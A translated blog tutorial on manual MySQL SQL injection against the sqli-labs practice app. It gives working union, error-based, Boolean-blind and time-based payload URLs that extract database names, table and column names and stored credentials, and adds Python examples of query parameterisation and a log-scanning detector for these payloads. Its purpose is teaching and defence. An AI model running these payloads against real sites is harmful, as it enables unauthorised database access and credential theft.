Network Security Advanced Learning Lesson 10 - MySQL Manual Injection

1. Common functions of MYSQL database

2. MYSQL default 4 system databases and key libraries and tables

Key libraries:information_schema

3. Determine the database type

For PHP websites, the commonly used databases are MySQL and PostgreSQL. One way to determine the database type is the default port the service listens on:

  • MySQL: 3306
  • PostgreSQL: 5432
  • MSSQL: 1433

4. Union query injection

Usage scenario: the database query result has a display position on the page (some fields of the result row are echoed into the page).

The UNION operator combines the results of two or more SELECT statements into one result set. The precondition is that the two SELECTs return the same number of columns.

1. Specific steps (lab demonstration):

1) First determine the injection point

Here you can determine that the injection point is the id parameter.

2) Determine whether it is numeric or character type

Test with the 1/1 and 1/0 method (arithmetic in the parameter).
Neither 1/1 nor 1/0 reports an error or changes the page, meaning the arithmetic has no effect. This shows the parameter is not numeric type.

Then append 1 single quote and 2 single quotes to test.
One single quote reports an error, while two single quotes do not. This shows it is character (string) type.

3) To determine the number of columns of injection points

Use order by, which sorts the result by column position. If order by 3 does not report an error but order by 4 does, the query returns only 3 columns.
POC used:
http://localhost/Less-1/?id=1' order by 4--+

Corresponding SQL statement:

select * from table name (unknown) where id='1' order by 4;
-- deliberately made to report an error: there is no 4th column

4) Get the display position of the database in the web page

After knowing the number of columns, you need to find the display position in the web page (the fields of the result row that are displayed on the page). Use union to splice a self-constructed select statement onto a query whose own result is empty.

As follows:
http://localhost/Less-1/?id=1

Corresponding SQL statement:

select * from table name (unknown) where id=1;

Shown on this page:

Your Login name: Dumb
Your Password: Dumb

http://localhost/Less-1/?id=2

Corresponding SQL statement:

select * from table name (unknown) where id=2;

The page shows:

Your Login name: Angelina
Your Password: I-kill-you

Construct a query whose original select returns no rows, for example by changing id=1 to id=-1, so that the row returned by the union part is what gets displayed,
using the POC:
http://localhost/Less-1/?id=-1' union select 1,2,3 --+

Corresponding SQL statement:

select * from table name (unknown) where id= -1 union select 1,2,3;

The page shows:

Your Login name: 2
Your Password: 3

In this way, we know that the display positions are the 2nd and 3rd columns of the data table.

5) Construct POC to query user name and database name

Put the functions to be queried in the display positions, such as the current user name and database name.
Construct the POC:
http://localhost/Less-1/?id=-1' union select 1,user(),database()--+

Corresponding SQL statement:

select * from table name (unknown) where id= -1 union select 1,user(),database();

The page shows:

Your Login name: root@localhost
Your Password: security

This way we know the user name and database name of the current database connection.

6) Check all table names in the database

POC used:
http://localhost/Less-1/?id=-1' union select 1,2,table_name from information_schema.tables where table_schema='security'--+

Corresponding SQL statement:

select * from table name (unknown) where id=-1 union select 1,2, table_name from information_schema.tables where table_schema='security';

The above only outputs the first table name, emails, and not all table names, because the page displays only one row.

To output all table names, use the group_concat() function to splice them into one string.
POC used:
http://localhost/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

Corresponding SQL statement:

select * from table name (unknown) where id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security';

In this way, you will know the names of all the tables in the security database: emails, referers, uagents, users

7) Find out all field names of a specific table

POC used:
http://localhost/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security'--+

Corresponding SQL statement:

select * from table name (unknown) where id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security';

Now all the field names of all tables in the security database are output here.

Now there is another problem: usually you only want the field names of the sensitive data tables, such as the field names of the users table. At this time, use the POC:
http://localhost/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

Corresponding SQL statement:

select * from table name (unknown) where id=-1 union select 1,2, group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users';

Now you know all the field names of the users table; here they are id, username, password.

8) Query all data in the users table

POC used:
http://localhost/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from users--+

Corresponding SQL statement:

select * from users where id=-1 union select 1,group_concat(username), group_concat(password) from users;

In this way, all user names and passwords have been found; at the same time, this confirms that the table behind the display position is the users table.

Tidy up the output:
POC used:
http://localhost/Less-1/?id=-1' union select 1,2,group_concat(username,'^',password) from users--+

Corresponding SQL statement:

select * from users where id=-1 union select 1,2, group_concat(username,'^',password) from users;

9) Use another way to view the data

You can also use concat() together with limit, instead of group_concat(), to view the table data one row at a time (group_concat() aggregates all rows into one before limit applies, so it cannot be paged this way).
POC used:
http://localhost/Less-1/?id=-1' union select 1,2,concat(username,'^',password) from users limit 0,1--+

Corresponding SQL statement:

select * from users where id=-1 union select 1,2,concat(username,'^',password) from users limit 0,1;

This way you can look at them one by one.
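As an added example that is not part of the original post, the following Python script reproduces the mechanics of steps 2) to 8) against a constructed SQLite table standing in for the lab's users table: a query built by string splicing, like the lab's Less-1 page, reacts to the quote test, the order by probe and the union payload exactly as described above, while the parameterised version treats the same input as an id value and returns nothing. The `--+` trailer in the URLs reaches the database as `-- ` (the plus decodes to a space), which is how the inputs below are written.

```python
import sqlite3

# Constructed stand-in for the lab's "users" table (schema and rows assumed; not the lab's own).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    conn.commit()
    return conn

def lookup_vulnerable(conn, user_input):
    """Splices the id parameter into a quoted string, like the lab's Less-1 query."""
    sql = f"SELECT * FROM users WHERE id='{user_input}' LIMIT 0,1"
    return conn.execute(sql).fetchone()

def lookup_hardened(conn, user_input):
    """Validates that id is an integer and binds it as a parameter: the input can
    never change the query's structure, so a quote or UNION inside it is just data."""
    try:
        id_value = int(user_input)
    except ValueError:
        return None
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (id_value,)).fetchone()

def probe(fn, conn, user_input):
    """Run one lookup and report ('ok', row) or ('error', message), mirroring the
    page-shows-row / page-shows-error signals the walkthrough relies on."""
    try:
        return ("ok", fn(conn, user_input))
    except sqlite3.Error as exc:
        return ("error", str(exc))

if __name__ == "__main__":
    db = make_db()
    # The probes from the walkthrough: quote test, column count, union with an empty first SELECT.
    for inp in ["1", "1'", "1''", "1' order by 4-- ", "-1' union select 1,2,3-- ",
                "-1' union select 1,group_concat(username),group_concat(password) from users-- "]:
        print(repr(inp))
        print("   spliced  :", probe(lookup_vulnerable, db, inp))
        print("   hardened :", probe(lookup_hardened, db, inp))
```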


5. Error-based injection

Usage scenario: database error messages are displayed on the page.

1. Commonly used error-reporting functions in MySQL (which of them actually raise an error depends on the MySQL version):

1)floor( )

Common injection syntax formats:

select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2)) x from information_schema.tables group by x) a);

2)extractvalue( )

extractvalue(xml_frag, xpath_expr)
Extracts a value from an XML string using XPath syntax.

xml_frag: the XML document (fragment), a string.
xpath_expr: a path in XPath syntax.

If the xpath_expr parameter does not conform to XPath syntax, an error is reported. The ~ symbol (ASCII code 0x7e) does not exist in XPath syntax, so once ~ appears in xpath_expr an error is reported, and the error message echoes the concatenated value.

Common injection syntax format:

select * from test where id=1 and extractvalue(1,concat(0x7e,(select user()),0x7e));

3)updatexml( )

Common injection syntax formats:

select * from test where id=1 and updatexml(1,concat(0x7e,(select user())),1);

4)geometrycollection( )

Common injection syntax formats:

select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5)multipoint( )

Common injection syntax formats:

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6)polygon( )

Common injection syntax formats:

select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7)multipolygon( )

Common injection syntax formats:

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8)linestring( )

Common injection syntax formats:

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9)multilinestring()

Common injection syntax formats:

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10)exp( )

Common injection syntax formats:

select * from test where id=1 and exp(~(select * from(select user())a));

11)gtid_subset( )

Common injection syntax formats:

select gtid_subset(user(),1);

2. Error-based injection steps (lab demonstration)

1) Make sure that database errors will be displayed on the page


2) Find the injection point (refer to union injection)

3) Determine whether it is numeric or character type (refer to union injection)

4) Use an error-reporting function to construct the probe

The updatexml() function is used here. If its second parameter contains characters that are invalid in XPath, an error is reported and the error message echoes that parameter. Here 0x7e is the hexadecimal ASCII code of "~".

POC used:
http://localhost/Less-1/?id=1' and updatexml(1,0x7e,1)--+

Corresponding SQL statement:

select * from users where id=1 and updatexml(1,0x7e,1);

5) Get the database name and user name

POC used:
http://localhost/Less-1/?id=1' and updatexml(1,concat(0x7e,database()),1)--+

Corresponding SQL statement:

select * from users where id=1 and updatexml(1,concat(0x7e,database()),1);

6) Get all table names

POC used:
http://localhost/Less-1/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

Corresponding SQL statement:

select * from users where id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1);

7) Get the field names of a specific table (refer to union injection)

8) Obtain data from a specific table (refer to union injection)

3. Error-based injection has a string length limit

The commonly used error-reporting functions have a string length restriction: at most 32 characters are output in the error message. If you use the group_concat() function directly, the output will be incomplete.

Example:
POC used:
http://localhost/Less-1/?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,'^',password) from users)),1)--+

In this way, only 32 characters of the content are output, and the entire content cannot be output.

At this time, use limit to output the rows one by one:
POC used:
http://localhost/Less-1/?id=1' and updatexml(1,concat(0x7e,(select concat(username,'^',password) from users limit 0,1)),1)--+


6. Blind injection

1. Boolean-based blind injection

Usage scenario: there is no display position on the page and database query errors are not shown on the page. The page only has two states, query correct and query error, as in the following situation:

Normal: true

Add 1 single quote: false

Add 2 single quotes: true

2. Boolean-based blind injection steps:

1) Find the injection point (refer to union injection)

2) Construct the probe

POC used:
http://localhost/Less-8/?id=1' and 1=if(1=1,1,0)--+

POC used:
http://localhost/Less-8/?id=1' and 1=if(1=2,1,0)--+

3) Get the current user name and database name length

POC used:
http://localhost/Less-8/?id=1' and 1= if(length(user())=8,1,0)--+

Then you can use Burp Suite (BP) to brute-force the length.
In this way, you find that the user name string length is 14. Using the same method, you find that the length of the current database name is 8.

4) Get the current user name and database name

Method 1:
http://localhost/Less-8/?id=1' and 1=if(mid(user(),1,1)='q',1,0)--+

You can also use BP to brute-force two payloads.

First payload, the position: just use numbers.

Second payload, the character: add English letters + numbers + special symbols. Pay attention to whether the server is case-sensitive.

In this way, the current user name is obtained: root@localhost. The current database name can be obtained in the same way: security

Method 2:
When the substring functions (such as mid()) are disabled and cannot be used, use like with '_'.
Taking the example above: the string length of the current user name is already known to be 14, and the user name itself is needed.
The POC used:
http://localhost/Less-8/?id=1' and 1= if(user()+like+'______________',1,0)--+

The return value here is true, because the underscore "_" in a LIKE pattern matches any single character.

In this way, BP can be used to brute-force the user name one character at a time.

5) Get the length of all table names in the current database

Construct POC:
http://localhost/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema='security'))=10--+

Using BP brute-forcing, the length obtained here is 29 characters.

6) Get the names of all table names in the current database

Construct POC:
http://localhost/Less-8/?id=1' and mid((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)='a'--+

Use BP to brute-force.
The first payload is the position; the total length is known from above to be 29, so the dictionary covers 29 positions.

The second payload dictionary adds English letters + numbers + special symbols. Pay attention to whether the server is case-sensitive.

Okay, so you know that all the table names are: emails, referers, uagents, users

7) Get the total length of all field names in the users table

Construct POC:
http://localhost/Less-8/?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))=10--+

Same BP brute-forcing.
In this way, we know that the total string length of the field names of the users table is 20

8) Get all field names of the users table

Construct POC:
http://localhost/Less-8/?id=1' and mid((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,1)='a' --+

Also using BP brute-forcing, the field names of the users table are obtained: id, username, password

9) Get the total length of each row of all data in the users table

Construct POC:
http://localhost/Less-8/?id=1' and length((select concat(username,'^',password) from users limit 0,1))=10--+

Start BP brute-forcing.
In this way, you will know that the table has 13 rows in total, and the string length of each row after concat splicing.

10) Obtain the target data of the users table

Since we already know the field names of the table, the number of data rows, and the total string length of each row after splicing, we can brute-force it row by row.
POC used:
http://localhost/Less-8/?id=1' and mid((select concat(username,'^',password) from users limit 0,1),1,1)='a' --+
I won't go into details about the specific BP brute-forcing; the operation is similar.

3. Time-based blind injection

The page has only one return state: true. No matter what value is entered, the response is handled normally. Add a time function (sleep) to the injected statement and determine whether the statement is correct by observing the difference in the web page's response time.

4. Time-based blind injection steps:

1) Find the injection point (refer to union injection)

2) Determine whether it is numeric or character type (refer to union injection)

3) Test whether the sleep function is filtered and whether it will be executed

The response time with sleep(1) is 13158 milliseconds

The response time with sleep(0) is 16 milliseconds

This shows that the sleep() function is executed

4) Get the current username and database length

POC used:
http://localhost/Less-48/?sort=1 and if(length(user())=10,sleep(1),1)--+
Here, if the guessed length is correct, sleep(1) will be executed.

Brute-force using BP.

Next, tick the response time column in the results.
An additional column appears. Since sleep(1) is only executed when the condition holds, the request with the longest response time is the correct result, which is 14 here. In the same way, the database name length obtained is 8.

5) Get the current user name and database name

http://localhost/Less-48/?sort=1 and if(mid(user(),1,1)='a',sleep(1),1)--+

Then use BP to brute-force. For the second payload dictionary, pay attention to adding English letters + numbers + special symbols. Pay attention to whether the server is case-sensitive.

It can be seen here that the characters obtained in order spell the user name: root@localhost; similarly, the database name obtained by the same method is: security.

6) Get the total string length of all table names in the current database (refer to Boolean blind injection)

7) Get all the table names of the current database (refer to Boolean blind injection)

8) Get the total string length of all field names in the users table (refer to Boolean blind injection)

9) Get all field names of the users table (refer to Boolean blind injection)

10) Obtain the target data of the users table (refer to Boolean blind injection)
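From the defender's side, as an added example that is not part of the original post, the following Python detector normalises the query string of web-server access-log lines and tags the request shapes used in sections 4 to 6 (union select, the error-reporting functions, if()/length()/mid() probing, sleep(), information_schema and order by probes). The log lines are constructed samples and the rule set is an assumption for illustration, not a complete signature list.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the original post); the query strings copy the
# payload shapes used in this lesson, URL-encoded the way a browser or Burp would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2023:10:00:01 +0800] "GET /Less-1/?id=1 HTTP/1.1" 200 1042
10.0.0.5 - - [01/Aug/2023:10:00:07 +0800] "GET /Less-1/?id=-1%27%20union%20select%201,user(),database()--+ HTTP/1.1" 200 1080
10.0.0.5 - - [01/Aug/2023:10:00:13 +0800] "GET /Less-1/?id=1%27%20and%20updatexml(1,concat(0x7e,database()),1)--+ HTTP/1.1" 200 988
10.0.0.5 - - [01/Aug/2023:10:00:20 +0800] "GET /Less-8/?id=1%27%20and%201=if(length(user())=8,1,0)--+ HTTP/1.1" 200 1042
10.0.0.5 - - [01/Aug/2023:10:00:28 +0800] "GET /Less-48/?sort=1%20and%20if(length(user())=10,sleep(1),1)--+ HTTP/1.1" 200 1042
10.0.0.5 - - [01/Aug/2023:10:00:35 +0800] "GET /Less-1/?id=2 HTTP/1.1" 200 1055
"""

# One rule per technique in the lesson; the patterns are illustrative, not a complete signature set.
RULES = [
    ("union-query",   re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("error-based",   re.compile(r"\b(?:updatexml|extractvalue|gtid_subset|geometrycollection|"
                                 r"multipoint|polygon|multipolygon|linestring|multilinestring|exp)\s*\("
                                 r"|\bfloor\s*\(\s*rand\s*\(")),
    ("boolean-blind", re.compile(r"\bif\s*\(|\b(?:length|mid|substr|substring|ascii)\s*\(|\blike\s+'_{3,}")),
    ("time-based",    re.compile(r"\b(?:sleep|benchmark)\s*\(")),
    ("schema-probe",  re.compile(r"information_schema\.|\border\s+by\s+\d+")),
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+)')

def normalize(raw_query):
    """URL-decode twice (catches one level of double encoding), collapse whitespace, lowercase."""
    decoded = unquote_plus(unquote_plus(raw_query))
    return re.sub(r"\s+", " ", decoded).lower()

def classify(query):
    """Return the names of all rules that match an already-normalized query string."""
    return [name for name, pattern in RULES if pattern.search(query)]

def scan_log(text):
    """Return (path, tags) for every request whose query string matches at least one rule."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path = match.group("path")
        query = path.partition("?")[2]
        tags = classify(normalize(query))
        if tags:
            hits.append((path, tags))
    return hits

if __name__ == "__main__":
    for path, tags in scan_log(SAMPLE_LOG):
        print(",".join(tags).ljust(26), path)
```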


Origin blog.csdn.net/p36273/article/details/132049931